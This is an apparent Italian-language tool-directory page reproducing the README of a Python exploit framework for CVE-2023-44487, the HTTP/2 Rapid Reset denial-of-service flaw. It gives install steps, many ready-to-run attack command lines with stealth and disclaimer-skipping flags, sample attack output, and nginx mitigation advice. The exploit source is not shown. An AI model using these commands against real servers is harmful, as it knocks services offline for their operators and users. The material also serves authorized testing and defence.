Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit — Advanced CVE-2023-44487 HTTP/2 Rapid Reset vulnerability exploitation framework. Features multi-connection concurrent attacks, adaptive rate control, stealth mode with randomized headers, real-time metrics, and risk assessment reporting. For authorized penetration testing only. By Sudeepa Wanigarathna | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
Exploit FrameworksVulnerability AnalysisExploitationWeb SecurityPenetration TestingRed TeamingAdversarial Attack
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

Vedi Repository
119 giorni faNon ancora revisionato

Advanced CVE-2023-44487 HTTP/2 Rapid Reset vulnerability exploitation framework. Features multi-connection concurrent attacks, adaptive rate control, stealth mode with randomized headers, real-time metrics, and risk assessment reporting. For authorized penetration testing only. By Sudeepa Wanigarathna

Condividi

CVE-2023-44487 HTTP/2 DoS Rapid Reset Exploit

Professional Edition v1.0.1 | Autore: Sudeepa Wanigarathna

Python Version License Version CVSS


Indice dei contenuti

  • Panoramica
  • Dettagli della vulnerabilità
  • Caratteristiche
  • Requisiti
  • Installazione
  • Avvio rapido
  • Guida all'utilizzo
  • Opzioni di configurazione
  • Supporto Docker
  • Esempi
  • Interpretare i risultati
  • Raccomandazioni di sicurezza
  • Disclaimer legale
  • Autore
  • Changelog

Panoramica

Un framework di valutazione di livello professionale per CVE-2023-44487, la vulnerabilità HTTP/2 Rapid Reset. Questo strumento aiuta i professionisti della sicurezza a testare e validare i sistemi contro una delle condizioni DoS HTTP/2 più impattanti divulgate negli ultimi anni.

Dimostra come la creazione e il reset rapidi di stream HTTP/2 possano esaurire le risorse del server e portare a condizioni di Denial of Service (DoS).

Caratteristiche principali in sintesi

  • Motore di attacco multi-connessione — Connessioni HTTP/2 concorrenti
  • Controllo adattivo della velocità — Regolazione dinamica per la massima efficacia
  • Modalità stealth — Header randomizzati e rotazione delle connessioni
  • Report completi — JSON/CSV con valutazione del rischio
  • Supporto Docker — Distribuzione containerizzata
  • Monitoraggio in tempo reale — Metriche di attacco live e avanzamento
  • Logging professionale — Output console colorato con logging su file
UsoRisultati

Dettagli della vulnerabilità

CVE-2023-44487: attacco HTTP/2 Rapid Reset

Panoramica tecnica

La vulnerabilità sfrutta il meccanismo di gestione degli stream del protocollo HTTP/2:

  1. Creazione dello stream — Il client invia un frame HEADERS per creare un nuovo stream
  2. Reset immediato — Il client invia immediatamente un frame RST_STREAM
  3. Elaborazione lato server — Il server deve elaborare entrambi i frame, consumando risorse
  4. Esaurimento delle risorse — I cicli ripetuti sopraffanno le risorse del server

Impatto

  • Esaurimento delle risorse sui server HTTP/2
  • Possibile Denial of Service (DoS)
  • Può colpire load balancer, proxy e CDN
  • Non richiede autenticazione o privilegi speciali

Caratteristiche

Funzionalità principali

Funzionalità avanzate

  • Supporto proxy — Configurazione proxy estendibile
  • Connection pooling — Gestione efficiente delle connessioni
  • Recupero dagli errori — Gestione pulita dei fallimenti di connessione
  • Ottimizzazione delle prestazioni — Impostazioni configurabili per diversi scenari
  • Integrazione CI/CD — Adatto al testing di sicurezza automatizzato

Requisiti

Requisiti di sistema

Dipendenze

root@kitploit:~
h2>=4.1.0,<5.0.0
aiohttp>=3.8.0,<4.0.0

Installazione

1. Installazione rapida

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 cve-2023-44487-exploit.py --help

2. Ambiente virtuale (consigliato)

root@kitploit:~
# Create virtual environment
python3 -m venv venv

# Activate virtual environment
# On Linux/macOS:
source venv/bin/activate
# On Windows:
venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

3. Installazione Docker

root@kitploit:~
# Build Docker image
docker build -t cve-2023-44487-exploit .

# Run with Docker
docker run --rm cve-2023-44487-exploit target.com

4. Installazione manuale

root@kitploit:~
# Install without requirements.txt
pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"

# Download the exploit
wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py

# Make executable
chmod +x cve-2023-44487-exploit.py

Avvio rapido

Utilizzo di base

root@kitploit:~
# Simple run with default settings
python3 cve-2023-44487-exploit.py example.com

# Test HTTPS on port 443
python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify

# Test HTTP on port 80
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

Test rapido (5 secondi)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

Valutazione completa (60 secondi)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify

Guida all'utilizzo

Opzioni della riga di comando

Configurazione del target

Configurazione dell'attacco

Opzioni avanzate

Report


Opzioni di configurazione

Usa i flag CLI sopra indicati per regolare concorrenza, volume degli stream, durata e report. Preferisci valori -c / -s / -d più bassi per la validazione iniziale, quindi scala solo su sistemi che sei autorizzato a stress-testare.


Supporto Docker

Creare l'immagine

root@kitploit:~
docker build -t cve-2023-44487-exploit .

Eseguire una valutazione di base

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com

Eseguire con parametri personalizzati

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60

Salvare i risultati in locale

root@kitploit:~
docker run --rm -v "$(pwd)/results:/app/results" \
  cve-2023-44487-exploit target.com -o /app/results/report.json

Modalità interattiva

root@kitploit:~
docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit

Docker Compose

root@kitploit:~
# Start with docker-compose
docker-compose up

# Run with a custom command
docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60

Esempi

1. Valutazione HTTPS di base

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30

2. Valutazione HTTP (senza SSL)

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30

3. Esecuzione di laboratorio ad alte prestazioni

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000

4. Modalità stealth

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60

5. Test di validazione rapido

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

6. Generare un report CSV

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv

7. Saltare la validazione

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30

8. Test di produzione autorizzato

root@kitploit:~
python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
  -c 100 -s 2000 -d 60 --stealth -o full_report.json

Interpretare i risultati

Metriche di output

Livelli di valutazione del rischio

Esempio di output

root@kitploit:~
================================================================================
EXPLOIT EXECUTION SUMMARY
================================================================================
Target: target.com:443
Duration: 30.00s
Total Streams: 15,234
Successful Resets: 15,198
Reset Rate: 506.6/s
Success Rate: 99.76%
Connection Errors: 0
--------------------------------------------------------------------------------
RISK ASSESSMENT
--------------------------------------------------------------------------------
Risk Level: CRITICAL
Risk Score: 95/100
Factors:
  - Extremely high reset rate accepted
  - Very high success rate
================================================================================

Raccomandazioni di sicurezza

Per gli amministratori di sistema

Azioni immediate

  1. Applicare le patch di sicurezza

    • Aggiornare alle ultime implementazioni HTTP/2
    • Applicare le patch di sicurezza specifiche del fornitore
    • Aggiornare load balancer e proxy
  2. Implementare il rate limiting

    root@kitploit:~
    # Nginx rate limiting example
    http {
        limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
        limit_req zone=http2 burst=20 nodelay;
    }
    
  3. Limiti di connessione

    root@kitploit:~
    # Limit connections per client
    limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
    limit_conn conn_zone 10;
    

Indurimento della configurazione

ImpostazioneRaccomandazione
Stream concorrenti massimi

Monitoraggio

root@kitploit:~
# Monitor HTTP/2 connections
netstat -an | grep 443 | grep ESTABLISHED | wc -l

# Monitor reset-related log entries (example)
grep "RST_STREAM" /var/log/nginx/error.log | wc -l

Controlli di sicurezza consigliati

  • Rate limiting — Implementare limiti di stream per client
  • Throttling delle connessioni — Limitare le connessioni per IP
  • Limiti delle risorse — Impostare i valori di timeout delle connessioni
  • Monitoraggio — Abilitare logging e avvisi per le anomalie
  • Regole WAF — Implementare regole WAF specifiche per HTTP/2
  • Gestione delle patch — Aggiornamenti di sicurezza regolari
  • Risposta agli incidenti — Avere un piano per gli attacchi DoS

Disclaimer legale

IMPORTANTE: LEGGERE ATTENTAMENTE PRIMA DI UTILIZZARE QUESTO STRUMENTO

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi.

Termini di utilizzo

Utilizzando questo strumento, riconosci e accetti che:

  1. Hai l'autorizzazione scritta esplicita per testare il sistema target
  2. Comprendi i rischi e il potenziale impatto di questa valutazione
  3. Rispetterai tutte le leggi e i regolamenti applicabili
  4. Accetti la piena responsabilità per le tue azioni
  5. Non utilizzerai questo strumento per attività non autorizzate

Utilizzi proibiti

Questo strumento NON deve essere utilizzato per:

  • Test o attacchi non autorizzati
  • Denial of service contro sistemi che non possiedi o per i quali non hai il permesso di testare
  • Interrompere sistemi di produzione senza autorizzazione
  • Causare danni finanziari
  • Qualsiasi attività illegale

Dichiarazione di responsabilità

L'AUTORE E I COLLABORATORI FORNISCONO QUESTO STRUMENTO "COSÌ COM'È" SENZA ALCUNA GARANZIA. L'USO DI QUESTO STRUMENTO È A TUO RISCHIO. L'AUTORE NON È RESPONSABILE PER DANNI O PROBLEMI LEGALI DERIVANTI DALL'USO DI QUESTO STRUMENTO.

L'uso non autorizzato di questo strumento può violare leggi, tra cui, a titolo esemplificativo e non esaustivo:

  • Computer Fraud and Abuse Act (CFAA) — USA
  • Computer Misuse Act — Regno Unito
  • Regolamento generale sulla protezione dei dati (GDPR) — UE
  • Altre leggi locali, nazionali e internazionali pertinenti

Autore

Sudeepa Wanigarathna

  • Ricercatore di sicurezza e penetration tester
  • Specializzato in sicurezza applicativa e vulnerabilità dei protocolli
  • GitHub
  • LinkedIn

Changelog

Versione 1.0.1 (corrente)

  • Corretto l'errore dell'attributo connection_attempts
  • Migliorata la validazione SSL/ALPN
  • Aggiunta la gestione dei timeout
  • Migliorato il recupero dagli errori
  • Aggiunto il flag --skip-validation
  • Migliorato il supporto Docker

Versione 1.0.0 (iniziale)

  • Prima release dell'edizione professionale
  • Motore di attacco multi-connessione
  • Controllo adattivo della velocità
  • Modalità stealth
  • Report completi
  • Supporto Docker

Licenza

Questo progetto è concesso in licenza MIT — consulta il file LICENSE per i dettagli.


Riconoscimenti

  • Team del protocollo HTTP/2
  • Ricercatori di sicurezza che hanno identificato CVE-2023-44487
  • Comunità open source (progetti h2, aiohttp)

Riferimenti

  • Voce CVE-2023-44487 su NVD
  • Analisi dell'attacco HTTP/2 Rapid Reset
  • Specifica del protocollo HTTP/2 (RFC 9113)
  • Advisory di sicurezza Nginx per HTTP/2
  • Guida alla sicurezza Apache per HTTP/2

Supporto

Per problemi e domande:

  • GitHub Issues: Apri una segnalazione
  • Email: [email protected]
  • Contatto per la sicurezza: Se trovi una vulnerabilità in questo progetto, segnalala in modo responsabile.

Scheda di riferimento rapido

root@kitploit:~
# Quick Commands

# Test HTTPS (skip cert verify)
python3 cve-2023-44487-exploit.py target.com --no-verify

# Test HTTP
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

# Quick test (5 seconds)
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5

# Full assessment
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth

# Skip validation
python3 cve-2023-44487-exploit.py target.com --skip-validation

# Docker
docker run --rm cve-2023-44487-exploit target.com

# Help
python3 cve-2023-44487-exploit.py --help

PROMEMORIA: Ottieni sempre la dovuta autorizzazione prima di testare qualsiasi sistema. Utilizza questo strumento in modo responsabile ed etico.


Mantenuto da Sudeepa Wanigarathna | Ultimo aggiornamento: agosto 2026

Scarica lo strumento
AttributoValore
ID CVECVE-2023-44487
Punteggio CVSS7.5 (Alto)
Vettore di attaccoRete
Complessità dell'attaccoBassa
ImpattoDenial of Service (Esaurimento delle risorse)
Protocolli interessatiHTTP/2
Data di divulgazioneOttobre 2023
FunzionalitàDescrizione
Supporto HTTP/2Implementazione completa del protocollo HTTP/2 tramite la libreria h2
Multi-connessioneAttacco concorrente su più connessioni
SSL/TLSSupporto HTTPS con opzioni di verifica dei certificati
Controllo adattivo della velocitàRegola dinamicamente la velocità di attacco in base alla risposta del server
Modalità stealthHeader randomizzati e rotazione delle connessioni
Monitoraggio in tempo realeVisualizzazione delle metriche live durante l'esecuzione
Report completiOutput JSON/CSV con valutazione del rischio
Supporto DockerDistribuzione containerizzata per test semplificati
ComponenteMinimoConsigliato
Sistema operativoLinux / macOS / WindowsLinux o macOS
Python3.7+3.11+
CPU2 core4+ core
RAM2GB4GB+
Rete100Mbps1Gbps+
OpzioneDescrizionePredefinito
hostHostname o IP del targetObbligatorio
-p, --portPorta del target443
--no-sslDisabilita SSL/TLSFalse
--no-verifySalta la verifica SSLFalse
OpzioneDescrizionePredefinito
-c, --connectionsNumero di connessioni concorrenti50
-s, --streamsStream per connessione1000
-d, --durationDurata in secondi30
--max-streamsNumero massimo totale di stream100000
--delayRitardo base tra le operazioni0.0001s
OpzioneDescrizionePredefinito
--adaptiveControllo adattivo della velocitàTrue
--target-rpsRichieste target al secondo10000
--stealthModalità stealth (header randomizzati)False
--skip-validationSalta la validazione del targetFalse
--forceSalta il prompt di disclaimer legaleFalse
OpzioneDescrizionePredefinito
-o, --outputNome del file di outputexploit_results.json
--formatFormato di output (json / csv / console)json
-v, --verboseLogging dettagliatoFalse
ScenarioFlag suggeriti
Smoke test-c 10 -s 100 -d 5
Valutazione standard-c 50 -s 1000 -d 30
Test di laboratorio ad alto carico-c 100 -s 2000 -d 60 --stealth
Certificato non attendibile--no-verify
HTTP semplice-p 80 --no-ssl
MetricaDescrizioneInterpretazione
Stream totaliNumero di stream creatiConteggio più alto = maggiore carico generato
Reset riuscitiStream resettati con successoTipicamente >90% su target vulnerabili
Velocità di reset (RPS)Reset al secondoVelocità più alta = carico più efficace
Tasso di successoPercentuale di reset riusciti>90% indica spesso esposizione
Errori di connessioneConnessioni falliteBasso = connettività stabile
Reset del serverReset iniziati dal serverAlto = presenti misure protettive
LivelloPunteggioSignificato
CRITICO80–100Server altamente vulnerabile
ALTO60–79Server vulnerabile, con qualche protezione
MEDIO40–59Presente una certa protezione
BASSO0–39Server ben protetto
Impostare a 100–200 per connessione
Velocità di reset degli streamLimitare a <100/sec per client
Limite di connessioniMassimo 50–100 connessioni per IP
Valori di timeoutRidurre i timeout di inattività
Limiti di dimensione delle richiesteLimitare le dimensioni degli header e il payload